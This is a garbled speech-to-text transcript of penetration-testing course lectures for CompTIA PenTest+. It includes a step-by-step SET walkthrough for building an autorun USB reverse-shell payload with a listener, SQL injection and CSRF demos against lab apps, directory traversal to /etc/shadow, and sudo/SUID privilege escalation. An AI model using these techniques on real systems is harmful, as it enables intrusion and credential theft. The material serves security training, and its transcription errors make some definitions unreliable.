talk tell you more about the company oh yeah it's a large company so we have 200 employees um that that person John Doe is our CEO and this is what I do my name is whatever so you're persuading someone to give you information now we cannot uh uh confuse make any mistakes in with um with impersonation we understand the difference we also have now in a more technical aspect we have fission sufficient is pretty simple actually that's what we see every day it's in our daily task to actually analyze it and just discharge it so

your everyday you are getting spam emails and phishing is actually an spam that's when you get an email with a link and that link will bring let's say a trojan horse or a backdoid wound start a back door or a virus in your machine and then the attacker will be able to do whatever once you have that softer installed in your machine now it's different from farming usually farming is an attack that is broadcasted by phishing attacks but I'm Sorry by emails so you as an attacker relays sends a bunch of emails to different employees

but you're not actually trying to force that person or lure that person to download a file because well I know that these people here they are they are security savvy so they are not going to Simply download a file that is attached to a weird email so what do you do you send an email but you have to make that email look legit that's the first thing so you have to send an email and you fake the origin you fake the source so there are techniques that will allow you to send an email and say

hey this email will show will appear to the recipients as the it will look as if the CEO is actually sending this email and then you can say for example you can say hey um I need you guys to access our intranet website because you have to do whatever you have to log in there and change your your information because we are updating our system so you have to go there and update your your data now phishing should also be make use of that reliability so you should also make use of trust try to make

that email to send that email by a source that is trusted by the the recipients but the difference again the difference between the email between phishing and farming is that phishing will try to lure the target to download a file whereas farming guitar the idea is not to force that person to download a file but to click a link that will redirect that person to a fake website and that website must look exactly like the original one now impersonation impersonation different from persuasion that's when you are impersonating someone so for example you grab the phone

you as an attacker you grab the phone you call the um the project managers secretary and then you say hey this is John I'm working with and then you you mention the demanded the the project manager's name I'm working with him but I he asked me to do something right now he needs it right now but I still need information that he was supposed to send to me but he didn't can you help me with that so you are impersonating someone it can be someone that works for the company it can be someone from the

outside a provider for example someone that is providing a service but you are impersonating someone now similarly to impersonation we have piggybacking but piggybacking is actually a mixture of a physical attack with the impersonation social engineering attack so if you put together impersonation and tailgate tailgating you have piggybacking therefore first we have to understand what tailgating is and basically this is a situation where for example you see someone entering the company so that person has a card to open the door swipes the card goes in and you try to just tailgate that person go in

uh leverage at that moment and enter the the premises as well now piggybacking is the idea of doing the same but using some social engineering skills in order to do that so you start a conversation with someone during lunch time for example and then you say hey uh where in which department do you work and that person will say then you say that you work for a different department obviously this will only work if the com it's not a small company so you need to do it when there is a very small chance that the

person could know everyone else in any other department so you do that to then be able to enter the premises with that person obviously we also have social media and this is not a direct type of social engineering but it it is still social engineering attack because you are using making use of a resource that provides information but that that information is only given to you if the person actually wants so for example Instagram you can gather information from Instagram but that that's only because the person that owns the profile went there and posted those

pictures updated status something like that we also have USB key drop or key drops so as you can see in this image right here you have a situation a scenario where you create a flash drive that is infected with for example a reverse TCP um trojan horse or a reverse TCP backdoor as we studied and analyzed in a previous module and then you just drop that flash drive somewhere expecting someone to grab it at some point and try to plug it into that person's computer out of curiosity for example or because maybe that person thinks

that it's his or hers her flash drive okay quid pro quo that's when you make favors to someone in order to expect a expect a some kind of payment for that favor so you help someone but you're actually doing that in order to then be able to say hey remember when I did that to you for you please I need your help now I need this I need that sometimes you don't even have to ask for it just by the facing that situation the the target is sees that you are requesting something and that person

will just try to help you as a payment similarly we have a more rough Tech which is bribery so if you've got a hold of critical information information that is supposed to be secret to someone or to the company you can use that information as Leverage so in this video we talked about some of the most well-known and used engineering social engineering attacks it is very important to realize there are some attacks that are actually social engineering attacks there are others that are physical attacks so for example dumpster diving lock picking tailgating those are physical

attacks there are situations though where there is a mixture you will have an attack that you make uses of social engineering techniques along with physical attacks I hope you enjoyed this video thank you very much hello guys module 8 lecture lecture two this is a Hands-On video and the goal here is to show a very known tool which can be used for to to deploy social engineering attacks it may help you deploy social engineering attacks so you must keep in mind that this tool here since it's a tool it will help you with the technical

social engineering attacks attacks that are most of the social engineering attacks are more human driven than technical driven so there are just a few cases in which you can use this tool to perform social engineering attack obviously you also have to do a lot of um human interaction emotional emotional interaction in order to achieve your goal and collect the data that you actually need but okay the two that we are going to take a very brief look at here is going to be the social engineering tool or set by default Kali Linux already comes with

this tool so basically you can simply do pseudo set toolkit you have to run it as the admin user and similar to the marisploit framework the set toolkit is also is a framework it's actually it brings together a bunch of tools and you are going going to see a an interactive menu which you can use and the set toolkit will help you do whatever you want to do so let me first run invoke the set toolkit here and there you're gonna have a introductory you're gonna see in a introductory screen the first time that you

run set the set toolkit it will actually show you a disclaimer and you have to agree with that disclaimer in order to continue using the tool basically what it will say is hey this tool here should be used for security purposes so you should use it to test your own environment you should not use it to perform attacks at least unless you have the permission of the other end to do search okay once you accept it you are going to face this menu right here so you have to select as I said it has a

an interactive menu to help you achieve your goal so it's going to show us a few options here number one social engineering attacks that's what we're gonna do you can also perform penetration testing it has a fast track penetration testing Suite so a bunch of tools scripts that will help you quickly performs some penetration testing third-party modules so there are a few there and you can always add more update the social engineering toolkit update set configuration it has a default configuration and you can change that you can look at the main page credits about or

you can exit with number 99 obviously we are going to pick Option 1 social engineering attacks let's go there and here are the options that you have number one spear fishing attack vectors so let's just remember that's pure fishing is related to sending emails website attack vectors this should be associated with the farming attack but it does not perform the the this option option two does not send emails it just fakes websites so for example you can fake a you can create a local web server that will run a few specific web pages for example

you can fake the Google web page you can fake Bing you can fake LinkedIn there are some web pages that you that you can fake there and it will also allow you to add other pages in case you want so you can customize it so it only gives you the web page it allows you to fake a web page okay it does not lower the the target to come to that web page three infectious media generator that is actually the option that we are going to use the attack that we want to do here is

the USB key drop so we want to generate a flash drive that will have a back door with the paid the the reverse TCP payload you may remember that the reverse TCP payload is the one that once executed in the Target machine which can be a Windows machine it can be a Mac OS it can be Linux there are reverse TCP attacks for many different operating systems we are going to see how to create it for a Windows environment but it also has other options so when you infect the target machine with the reverse TCP

payload that machine will connect to your machine on a specific Port so your machine has to be listening on that port in a way that when the Target executes that payload executable file it will connect to that Port that Port must be running in your machine then you can get full control to that Target machine remotely so that's what we're gonna do you can also create Mass mailer attacks Arduino based attack Vector wireless access point attack Vector QR code generator attack Vector Powershell Powershell attack vectors and some additional attacks that you could provide using some

third-party modules so what we're going to do here is go to option three and there is an explanation right there the Infectious USB CD slash DVD module will create an auto run.inf file and a metisploit payload when the DVD USB CD is inserted it will automatically run if autorun is enabled pick the attack Vector you used to you wish to use file format bugs or a straight executable those are the options that we have file format exploits or standard metisploit executable we are going to pick option 2 because the set toolkit will interact with the

Metasploit executable that we already have so it's leveraging the framework that we already have in our system The Meta exploitable metisploit executable so what is the the the system you are willing to attack and which type of payload are you trying to are you willing to create so there it is you have a few options there the option that we are actually going to use is option two windows reverse TCP meter preter so option two what's the IP address for the payload listener once again this type of attack occurs by forcing the target to connect

to your machine and then your machine will use your machine as an attacker we'll use that channel that connection to issue commands remotely to the Target machine that's what it's called that's why it's called reverse TCP so the server here is your entire your attacker machine it's not the target machine so the IP address that you have to provide is your machine or the machine that you are going to use to control the target machine in my case you may remember that my Kali Linux machine has this IP address 192.168.0.20 and what is the port

that your machine will listen to usually for some reason this is the default for the reverse TCP payload 4444 but it really doesn't matter you can specify any port you want I enter and it's generating the payload please be patient let's remember what is the payload so the payload is actually the file with the instructions it's the header with instructions of what is supposed to be executed it's the attacking code so payload has been exported to the default set directory located under slash root slash dot set slash payload.exe your attack has been created in the

set home directory folder auto run note a backup copy of the template file is in that location copy the contents of the folder to a CD DVD USB to auto run so observe here that we have two different things one is the payload file is stored in slash root slash dot set slash payload.exe in case you just want to send to copy the payload the back door to the flash drive that's the file that you have to create but that's not actually what you want right you want to make it an auto run attack so

you want to make sure that once the target plugs that flash drive in or um inserts the the media the CD or the DVD media it automatically runs the the payload what you have to do is to actually copy the content of the slash root slash set slash auto run folder to that flash drive in that case okay create a listener right now yes or no so basically it's asking do you want to do you want me to run the listener right now do you want me to open port 44444 and keep waiting for that

Target to connect to that Port so that I can reverse TCP and send instructions to that Target well if you do you answer yes in a case where you're not going to run it now because you're still you're not yet um providing that flash drive to someone somehow then you can enter no and you can run it back later on let me answer yes and launching merisploit this could take a few be patient or else no shells for you and there you go started reverse TCP Handler on 192.168.0.20 so observe here that this is marisploit

running right here right there okay so the reason why we chose this option right here standard meta exploit executable is because when I invoke The Listener as I do now it's going to launch my merisploit framework which is going to make it a lot more a lot easier for me okay so it's processing the the instructions required to um run the the reverse TCP attack you may remember that to do that using metisploit we have to set a payload which is this payload right here when we do that we have to set the L host

variable the L Port variable and then it will execute that that that listener there it is the listener is running now all that I have to do is to copy so I'm going to quit here because I really don't need it 99 99 now I am going to look at the content of Slash root slash dot set directory and we have the payload.executable there but we also have the auto run directory over there with the autorun.inf and program.exe that's what you need to copy to the flash drive so in this video we saw how to

actually Implement a social engineering attack using the social engineering toolkit set I hope you enjoyed this video thank you very much hello guys welcome to module 9 9 and our topic here is going to be application vulnerabilities now the most of the application vulnerabilities that we are going to find are associated with some kind of injection vulnerability and that is actually going to be our Focus here we will also see that there are many many different types of injections now there are vulnerabilities that they are not properly associated with injection at least application vulnerabilities that

are not precisely associated with injections so as an example we can simply see a misconfiguration but in the long run most of these vulnerabilities although they are not directly associated with injections one way of exploiting those vulnerabilities is by injecting some code for example which characterizes a injection vulnerability or injection attack so let's see let's talk about some of those nowadays most of these applications are web applications and since most applications are web applications they are usually communicating they as in applications are usually communicating with a database and that is actually why SQL injections are

so famous they they are constantly being used these vulnerabilities are always there and we have to tackle that we have to address that type of vulnerability now one way of Defending against this type of vulnerability is validating the input so while validating the the input basically means you as a designer web designer or web developer if you will you should validate the input fields that your website has so let's say that your website has a form that will require name telephone number email and then comments right while those fields should be validated but there is

one problem if you want to make these forms very flexible give options to the user so that he or she can type a lot of stuff for example the comments field that means that it's very difficult to specify the strings that are accepted that that can be accepted so in this type of form implementing a white list becomes very very complex therefore it's easier to implement blacklists so in in a blacklist you're gonna see you as a web developer is going to say or the the web application firewall admin is going to say hey these

are the keywords or these are the strings that are restricted or the symbols that that are not allowed whereas in a white list you have to specify this is what this person can do can enter so you can see the complexity of doing that now once again that is why SQL injections are so common because it's very difficult to deploy this this kind of Defense so validating input can be very complex and due to that complexity attackers can come up with strings that will that they in which they try to disguise that string within another

legit string so if we take a look at an example here so you can see that in this URL and this is just one way of entering a URL so when a web application performs a SQL statement basically what that application is doing or even the web server is doing this accepting the URL the the link to the page the address to that page question mark and then some fields that are supposed to be accepted right so here basically what we're doing is okay so this is a login page called login.php we use the question

mark and then we specify the input fields that we have to fill out in this case we have user we could even have user equals John and password equals whatever is the password that you want to to Define now the key thing here is this whatever comes here is going to be a regular input field that you're filling out correct now the problem is that this is going to actually be appended to a to a SQL statement attackers since they know that whatever comes after the question mark is going to be appended to a SQL

statement they can come up with additional strings that will be added to that therefore they can even come up with for example a string that will always return a True Result so in this case as we can see here the what they are doing is informing user well obviously you have to know that user is a valid input field which is very easy to to know to visualize and then we finalize that statement with the single quote but it's not actually the statement that is being finalized it's actually just that portion of statement just what

completes what is expected by the built-in statements statement but then we append something else in this case we are pending or one equals one as you may know or means any True Result will actually return a total result of true as well and since one will always be equal to one then the result is true this means that let's say that this is a login webpage if this web application is not protected against this type of SQL injection that user that attacker will be able to log in as an admin user you are actually going

to see that in our lab class in the lab video where I'm going to show show you how to implement this using a vulnerable vulnerable website that belongs to the Duke Juice Shop project from OS now there are situations where the web developer foresees this possibility and tries to prevent that in that case there is another type of attack that will just Implement parameter pollution basically what's being done here is appending new parameters new input fields to the SQL statement because for example one of the protections or defenses against AC conjunction at least a simplistic

one is to verify whether the attacker is informing just one single parameter as we can see in this first example right here or and maybe it's not that's the only thing that is being verified so what the attacker can do is instead of informing just one single parameter in inform another second third fourth parameter here in the second example we have user John and user John again it's the same parameter but it doesn't really matter if the defender the web developer will is only verifying for a singularity of parameters now in many situations there are

web applications that they in order to defend against SQL injections what they do is they prevent response so when you inform a SQL statement that web application is not going to give you a result so you don't actually know whether that website is vulnerable to SQL injections or not but one good strategy is to realize that in order to verify whether the website is vulnerable to SQL injections is verify whether it is not vulnerable what does that mean when a website is protected against different kinds of SQL injections it will actually return you an error

message if it doesn't return you anything at all in different situations that means that it can be vulnerable to SQL injections it's just not returning an output so that is called a blind SQL injection and this example here where you inform any input field equals any value single code or one equal one is one example of a SQL injection that can show you that it is a blind SQL injectable website now other kinds of injections we have code injections the most common one is cross-site scripting or xss which can be basically divided into diff two

different types we have the reflected xss and the persistent xss what is the difference between those two well first we have to understand what cross-site scripting actually is basically cross-site scripting is a type of attack where someone injects some code usually it's a site script so it's a script that is executed on the client side it forces that client to execute that script obviously this script tends to be something malicious for example a pop-up window will say hey click here you just you're gonna you just um you you're gonna get a one thousand dollars reward

click here when that person clicks there something happens that person is redirected to a fake website a bogus website a trojan horse is downloaded and installed in that person's computer something like that now what is the difference between a reflected cross-site scripting attack and the persistent one reflected happens when the website the website developer is actually aware of that code of that malicious code what what that means is you are accessing a website that is not trustworthy you are accessing a website that you should not be accessing that website that website developer wants you to

access it so that he or she can execute a script on your machine on your browser now there is another one that is persistent and that is a situation where a scripting code is stored in a website usually the maintainer the developer is not aware of that code but somehow he or she allowed someone to inject that insert that code into his or her website it's very common to be used on discussion boards on forums so you access a forum web page and someone access it earlier and posted something within that code there was a

malicious JavaScript for example when you access it well it's not the website developer that posted it there it was someone else and when another client access it that code is going to be executed by your web browser we also have the command injection and one way of executing uh performing command injection attacks is over websites that allow common Gateway interfaces commonly as commonly known as CGI now one language that is very used in order to create CGI websites is PHP Pro Bash and what is the problem with this type of Technology the problem when using

a CGI Gateway is because what it's actually doing is allowing that website to send instructions system instructions via the web server so the those instructions are systems instructions for example a very simplistic one you can create a CGI website that asks for a user uh asks for any command so you're creating a website to train users to learn Linux so in order to see whether your students are actually learning Linux or not you create a website that says hey place in here any Linux command and let's see if it actually works okay but when you're

doing that you are actually not allowing allowing that user to execute a system command and you never know what that user is actually going to execute what kind of instruction is going to be sent cross-site request forgery attack so x s r f is actually the opposite of cross-site scripting how so cross-site scripting is a type of attack where a the client relies on the server so the client is accessing a website and trusting that website okay I'm going to access this page because I know that I can trust this guy or this company but

then that may not be the case there is the opposite a situation where the server trusts the client so let's see an example and we are actually going to execute it to see how it works in our lab class our lab video so one example is let's say that you just accessed your bank account your online bank account you are already logged in which means that a trustworthy session has been created that means that web server actually trusts you as a client meaning that when you enter a URL that website is not going to ask

you to re-authenticate you you are authenticated let's say 30 seconds ago you don't have to do it again that's why we created a session that's why I asked for your credentials okay but then the client can access another website open another tab for example uh on the browser and using that other tab you access a suspicious website and that website says Hey click here and you go then click but that is actually a link that is a reference a URL that sends an instruction to your other website your bank account and it's actually telling you

to make a a wire transfer for example since you are already logged in your bank account that transactions the transaction is actually going to work now it requires that the attack no the attacker knows a bunch of stuff that specific URL the fields the input fields that are required to perform that Trend that wire transfer and a bunch of all the other stuff but you have to also remember that there is a possibility that the attacker knows the type of website that you access well if he knows that you have an account in a specific

bank all that takes is that the attacker knows the specific URL to perform a wire transfer so it's not actually it's actually not that complicated we also have session attacks such as session hijacking we are going to see how a session hijacking Works basically once again it's based on cookies once you establish you access a website that website will send you a cookie a cookie or a set of cookies that cookie can be used for another interaction with that website so a bunch of authentication steps may be skipped because you already have that cookie if

an attacker can get a hold of a cookie well then he can interact with that website um impersonating you as a client also an attacker can capture the traffic and capture the session ID that is being used between you as a client and a web server he or she can then establish let's say interrupt your conversation with that website and start to talk into that website using that session ID impersonating you which is a client we also have redirects which is actually a very simplistic type of attack but also very accurate and so let's say

that it works as a website and that website says hey we moved somewhere else you are being automatically redirected okay then you after five seconds you are redirected to somewhere else this type of attack happens the same way occurs the same way the difference is you are actually being redirected to suspicious website at least and that is very common to see when people are trying to access websites that are supposed to be paid for or services that you have to pay for but they're trying to find pirate websites so they promise that you can go

there and you can for example watch a video online not paint a movie online not paying for it you just have to click there and then you click click somewhere and it says you're being redirected when you see well okay so you are in a website that will allow you to watch that video but you don't actually know what else is behind that direct objects reference and we can see one example here many many websites are not protected against direct object reference what does that mean if you have a website you are hosting a website

and from that website people can actually get access to documents or objects so for example a teacher a teacher has website and that person is going to post docs PDFs after each class for example so that students can go there and go back to the the the the content that they studied during that class but the problem is those documents should only be available when they are supposed to be available is it possible for a student for example to instead of accessing doc ID one two three four if that student just goes there to that

URL and change it to Doc ID equals two three four five will he or she be able to download that document let's say yes but is that supposed to happen is he or she is supposed to be allowed to access it so that is a direct object reference it's okay to allow people to access these documents you just have to make sure that only the ones that are supposed to be allowed are actually allowed and you ASAP testers should verify this whenever you see a direct object reference we also have directory traversal so director traversal

occurs when you are accessing a file so let's say using the same example here www.example.com slash doc dot PHP okay so I know just looking at it I know that there is a file called doc dot PHP okay if I check and I see that this is a HTTP Apache web server there is a very high probability that it's stored in slash VAR slash www uh directory okay what if instead I erase I delete doc dot PHP and I enter dot dot slash dot dot slash Etc obviously I have to know the system I have

to know the service the the app that is running the service but if I do I can try to in this example that I just gave I'm trying to go back to the root directory and then enter the slash Etc directory if it works I can even try to retrieve the shadow file and similarly we have the file inclusion attack which is a type of attack that the web server allows me to send upload files send files obviously I can try to send a trojan horse a back door replace an existing file for example the

slash UTC slash pass WD file in order to use a file that contains a user account that I know about we also have to verify coding issues as pen testers we have to see if the web developer and the web what the the network admin if they are treating errors if they are handling errors so for example this image here illustrates an example of a IIs web server that does not properly handle the the the an error message so you can actually see here that this SQL error here is giving you a bunch of information

here so okay what happened there was a form probably there was a form that was asking for a bunch of information such as name password ID and the attacker or just a regular person a regular user didn't inform the ID and hit submit for example well what the website was supposed to do was say hey empty field this field cannot be empty but no that's not what happening the error was not handled so what is going on here that web application is actually returning the error message that the web server returns and that actually gives

in this case an attacker a bunch of information so now we can see here information such as ID is an attribute it's an integer attribute there is a a module called a function called protected void page load and there is a bunch of other stuff here that we we could find comments is also very dangerous it's very useful so if you're a developer inserting comments in your code is obviously very helpful the problem is if depending on the type of web page that you're creating if you insert comments in that page a user or an

attack can try to see the source code of that page and that will also allow the attacker to see the comments if the developer is making comments that are that can be can give more information that it's supposed to to give than the attacker will use that additional data hard-coded credentials obviously this is critical because for example if the when we have this type of failure there is a very high probability that other services are also using that same password so if someone gets access to a source code and in that source code there is

a user and password for example there is a very high probability that is a user a valid set of credentials for other services as well shared apis also another problem we see every day for example you're using a app you just installed a an app in your iPhone for example and since it's the first time it's going to ask you for credentials okay you have to create your membership credentials or you can simply use your Facebook account for example well and then you just click use Facebook account that app is going to connect to your

Facebook account and then you're logged in how does it do it it's using a shared API a Facebook API it's a set of functions that allows other applications to access your account obviously you can see um how critical that is you are actually allowing other users other softwares or developers to access another app using valid credentials now as a pen tester you have to be aware of static and dynamic application security testing tools because you're actually going to have to verify if the applications that are being used by your client are reliable and if they

have failures you have to at least report that to your client now there are some tools that can use you as a can help you as a pen tester to verify whether the the applications that are being used by our client are secure or not so first of all we have this static application security testing tools or zest basically they're only going to verify this source code they are not going to verify this the the uh the flow of of the code but just the syntax of that code it does not execute the application it

just verifies the source code so that is a static application security testing tool here on this link over here you can actually see a bunch of SAS tools for different languages different operating systems different architectures you just go there find the disaster to the according to the system that you are trying to verify and we also have the dust Dynamic application security testing tool these are tools that are actually going to execute an application and allow you to say hey I want to test this attribute here I want to test this I want you to

to inform this input field here with this content it's a tool that will dynamically execute that software that you are analyzing and give you the chance to interact with it some examples that we have and that you have to know know about for the CompTIA pentas plus exam are the OSP Zed attack proxy tool and burp Suite we are actually going to analyze burp Suite now we also have fuzzing dust tools the difference between a regular desk tool a fuzz industrial is that fuzzing Dash tools they dynamically in an automated way fill out those fields

for you so it's a tool that will verify what are the possibilities of interaction and we'll automatically create data to pass to that software and verify if flaws can be found some examples here that you must also be aware of for the CompTIA pentas plus exam are the American fuzzy lob or AFL AFL and peach fuzzer peach fuzzer is a commercial tool whereas American fuzzy Lop is a open source to end free tool so in this video we discussed some we discussed sequence different types of injections such as SQL injection different types of code injection

and some tools that can be used in order to leverage or test those types of injections we also talked about the concept of ecstatic application security testing tools and dynamic dust tools along with some automated testing tools called fuzzing dust tools I hope you enjoyed this video and we're gonna see some of these tools in our next Lab video thank you very much hello welcome to our second video in module 9 and we initially discussed some types of application tags more precisely web application attacks such as we saw attacks such as SQL injection and different

types of code injection cross-site scripting cross-site requests forgery session hijacking and so many others in this video we are actually going to see tools that can be used to exploit some of these those flaws or techniques ways that you can actually practice now we have to keep in mind that the CompTIA pentas plus exam not only requires you to know some tools but it also requires you to so to show that you can use techniques you can actually run exploits even when to exploit a vulnerability you have to do it yourself without using a specific

tool so for example SQL injection in order to perform SQL injections you have to understand how it works and then you try to deploy it so this is what we're going to see here not only tools that can be used but the techniques how to explore and exploit those techniques therefore a project that I want you to take a better look at and if you can go deeper dive deeper into it try to go through all the flags that you can so this is the OS Juice Shop project so it's a project from oasp where

the intentionally created a web application that has a number of vulnerabilities more specifically the top 10 web application vulnerabilities and you have to try to capture those flags so that's the OS Juice Shop if you want you can download it Deploy on your own server this is not what I am going to show here actually I'm just going to very briefly show you how to access it and how to perform a SQL injection attack a very simple one but again I strongly recommend you to go through all the 10 Flags os.org slash www.project Juice Shop

and if we go down here all the way down and here in documentation we have online demo and that's exactly where we are gonna go and that is the OS Juice Shop that they already give to us it's a online project now as I mentioned what they do is they created a website that sells juice all different kinds of tools okay all different different kinds of projects and then you have to capture the flags what we are going to do is I'm gonna go here in account and login as you know a SQL injection attack

is an attack where you try to pass additional SQL statements to an ex appended to an expected SQL statement so what I'm going to do is here in email it's expecting some kind of string I'm gonna do whatever and I'm going to close that string but then I'm going to append or 1 equals 1 comma semicolon Dash Dash I'm going to inform anything here as plot password and login okay so well seems like you just reloaded the page but if I go here to account I am logged in as a admin user there it is

so this is a very simplistic type of SQL injection but there are many websites that actually accept it another one that I want you to see is I created another virtual machine another very exploitable virtual machine but this is not meta exploitable 3 with the Windows 2008 server this is very exploitable 2 which comes with a Ubuntu Linux not exploitable system and out of all those services that come along it has a web server as well so what I'm going to do here is to access that web page which is right here let me do

this there so that's the very exploitable 2 web server and it gives to us a bunch of different web pages the web page that I am actually going to access is the dvwa and it asks for a user and password I'm going to form it there there it is so again similar to The Juice Shop this is a a server that has a bunch of flaws intentionally they built a bunch of flaws okay so this is the damn vulnerable web app dvwa and let's take a look at one here shows us cross-site request forgery or

or csrf or x s r f okay so it's asking for the current password I'm going to inform here its password okay the new one is going to be I'm going to keep it the same password and password okay good change password changed now what matters to me is the URL up here you can observe that here in the URL we have the input Fields along with their values so password current it's this input field here the content is password password new which refers to this field here is also password and confirm new password which

is the password conf attribute right here value password okay here's what I'm going to do I'm going to open another another Tab and in this other tab I am going to change password okay so password current is the current password new I'm going to change it to pass not password and password conf also pass not password and I am going to hit enter okay so it's showing the same web page same result and here's what I want to see I'm going to log out admin user I'm going to inform the original password which is password

and no it didn't work I'm going to inform admin with password pass and there it is so what happened here I use the URL to change my user's password and what did we see here we saw a type of x s r f attack cross site request forgery attack if I am an attacker and I know that using a URL I can change data I can change information of someone or I can perform a specific action such as execute a wire transfer if I know that user is logged into that specific system in this case

logged to the dvwa system if I can force that user to execute that URL I can get him to change the instructions the information that I want or perform the action that I want him or her to execute so this is a demonstration of the XS RF attack now another attack that I want you to see is the cross-site scripting attack and this is the stored cross-site scripting attack or persistent if you will I have two HTML files here I have the no xss.html file which simply has just some basic HTML instructions okay here I

am executing that file no xss.html what does it do okay it just shows the HTML content that I created now what I'm going to do is I am going to create another one which is the xss HTML and what does it have here just one different instruction there is a script which says alert gotcha so it's just a pop-up right but what I want you to see is that I can actually create a web page that will force the web browser of my client to execute something that person is not aware of for example I

could force that person to download the file could force that person to web a specific web page I could force that person to send a specific submit a specific form whatever that is so let me execute that file and see how it actually works and there it is here is the xss.html file gotcha that's the pop-up window and then the web page well now I just created a pop-up message but I could do a lot more with it and lastly to finalize let's take a look at a tool called burp Suite and here I'm going

to go to my kala Linux virtual machine and all you need to do is to run and you can run burp Suite with a regular user account I just want to make sure that I I will have all the resources that I need in case I need any additional resources so that's why I'm executing it as a pseudo user as a admin user now the burp Suite has actually has a bunch of feature the feature that we are going to use is just a proxy and it's saying that my Java runtime environment is outdated which

is okay and I'm going to start my project so I'm going to run it as a proxy server similar to a squid proxy now what is different about it so I'm gonna go here to proxy and we can see that we have this button here intercept is on so it's not only capturing uh not caption but receiving requests from my proxy clients so I am intercepting as any proxy does but I am not going to forward that request until me as an attacker or admin allows the app to do so so first of all what

we have to keep in mind this is a proxy web server so you have to make sure that ER proxy is running on the appropriate port and IP address by default it's going to listen on the localhost IP address Port 8080. I am going to add a new one so it's the same port 8080 but I'm going to associated with this IP address here which is my uh my internal Lan IP address why because now I am going to go to my Windows 2008 server and tell it hey you have to use that proxy server

so I am going to intentionally tell my Windows machine my Windows Virtual Machine right here which is my Mery exploitable 3 Windows 2008 virtual machine that it's supposed to send HTTP requests to that proxy server which is very common any company use proxy Services proxy servers nowadays but now I am going to see that when I perform a request so I'm going to search for Google Maps and we can see that it's waiting for the response I'm gonna go back to my burp Suite here and we can see that enter The Intercept tab is now

highlighted I'm gonna go there so it says Hey There is a client it's a Windows client that is requesting something okay seems like I cannot find anything special here so I'm going to forward allow this packet to be forwarded okay there it is okay here I can see this search that is being performed the URL requested by that client and it's requesting HTTP here's what matters to me it's the search so that client is searching for Google Maps let's do this Apple Maps and I am going to forward that request and let's see what's going

on there there it is although this user searched for Google Maps we can see that the result is Apple Maps so I changed the content of that transaction so this is a type of interception that we can perform we can change instructions using a dynamic application security testing tool such as burp Suite we could also use OS Plus app so these are some tools that we just saw that are very helpful for us as pen testers in order to analyze whether a client application is specifically web application is secure or not I hope you enjoyed

this video thank you very much hello welcome to module 10 and our focus in this module is going to be host pen testing or host vulnerabilities or exploiting hosts now we've seen how to exploit applications and Network Services we also took a very brief look at exploiting hosts or devices but we didn't treat that topic in depth and that is going to be our goal here most of the concepts involving attacks have already been covered that is actually why we are going to move to a much more Hands-On module this module here will not have

a presentation following slides the concepts the theoretical Concepts that are required in order to understand hosts exploitation will be covered as we see as we learn how to use the the tools that we will have to use or that we have available now always remember these videos these modules here are focusing on the CompTIA pentas plus exam so the tools that we're studying the tools that the tools that we're analyzing are tools that might you might see in your CompTIA pen Test Plus exam and when it comes to host exploitation one of the requirements made

by the comp for the CompTIA Pentacle exam is to make sure that you understand not only Windows exploitation but also Linux exploitation for one very specific reason this is an operating system that is very much used in servers and when it comes to host exploitation one of the chances that one of the possibilities or one of the flaws that you may find as a pen tester is permission regarding permissions now obviously we're not going to focus on finding or verifying permissions of files at least not the traditional permissions such as read write and execution because

that is very Elementary however there are some what they what they call special permissions or special bit permissions that must be covered and those are the S user ID or super user ID permission suid we also have the group ID the S group ID sgid and we have the sticky bit we are not going to thoroughly analyze a sticky bit because for a very basic basic reason the only way that you can exploit this sticky bit is in a a specific situation where a directory should have this sticky bit enabled and it doesn't now in

regards to the suid and the sgid there are situations that these bits are supposed to be enabled but you the network admin must be or the system admin must be very much aware of what kind of tools these special bits can be enabled and the ones that they cannot or at least they shouldn't and also we are also going to analyze the pseudo tool which nowadays is very much used and that's what we're going to start with so first of all we have to understand the pseudo tool and also its configuration file so a very

basic concept involving this pseudo command is let's say that you you need maybe one user or a certain number of users or a group of users that should be allowed to execute a specific tool for example or a set of tools a set of commands as another user and this other user should have permission to execute that tool so for example let's say that regular users can invoke the ifconfig command as long as they are not changing the network interface configuration the the configuration of a network interface so a regular user could for example execute

and it's not the case here unless we try the full path so there it is I am a regular user as you can see that's my user here Kelly and I can if I use the full path I can execute ifconfig however if I try to change the configuration of my network interface I won't be allowed to for a very specific reason I am a regular user as we can see here most systems nowadays regular users have ID above uh above 999. so from starting at 1000 now what if I want to allow this user

Kelly to execute a few set of tools as the only user that can actually execute those administrative tools which is the root user well that is actually how the Kali Linux and Ubuntu for example are configured when you install these systems you will have to create a regular user but this regular user will be allowed to execute administrative tools as the root user as long as you use the pseudo command so for example I can do this it will ask for my regular user's password it's not the administrative password it's just to make sure hey

I want to know if it's you Cali user that is actually trying to execute this command or maybe you just left for a coffee someone came and is trying to execute a command a an administrative command so you have to know your own password okay so I type it in and there it is now it works and observed that I didn't have to use the full path just the command directly that is because I am now invoking it as a as the root user well not root user but I'm invoking this tool um via the

pseudo command okay now what if I want to see whether my user can execute commands administrative commands when using the sudo tool or if my user can execute can invoke the pseudo command at all to run any other tool even if it's not an administrative tool so you can use the pseudo space Dash L it will list all the tools the commands that you are allowed to execute so we can see here that as I mentioned a minute ago since this is the user that I created during the installation this user will be a lot

so user Cali may run the following commands on Kelly that's also my the name of my machine so I can run all commands as who as the root user as any rules or any user including the administrator all okay now if I had a user that would be allowed to execute for example bash or python or VI that doesn't seem to be something dangerous right so if I do for example if I come here and I say that and I say that user whatever okay can execute slash bin slash Bash okay well this doesn't seem

to be something dangerous right I'm just allowing a regular user to invoke a terminal open a terminal as the administrator or I could do the same thing with the vi editor so for example let's say that I have I'm a network admin and in the company just hired an intern and I want that intern although he or she will have a regular user limited user I want to allow him or her to edit files however there are some files that are required to be edited the the user must open edit those files as the administrator

only the administrator can do it or any other user that has some additional permissions okay so I could come here and say slash USR slash B in the slash Vim for example VI improved okay that's no big deal right at least seems like there is no big D or deal here however there is and the problem is if I say that this user will execute this tool here as for example the root user if this regular user do does pseudo space Vim space slash Etc slash Shadow which is the password the database that stores the

user's passwords hashed passwords well I'm saying that that user will be allowed to change passwords obviously it's hashed so he or she won't be able to actually go there and say okay I'm gonna change this password to this other specific password however first of all I will allow him or her to delete that password so just leave it with a blank password empty password or I will allow him or her to read that file that is hashed it contains hashed passwords however he or she will be able to use a tool such as John the

reaper for example to try to crack those passwords so it is very dangerous now that is why we are also going to take a look at the suid bit so let's take a look at one file that has the SEO ID bit enabled slash USR slash beam slash pass WD okay there the way that we identify oops the way that we identify the sui debit is by looking at the execution permission and instead of X it shows s that means because we must remember the first three bits identify the permissions for the user the owner

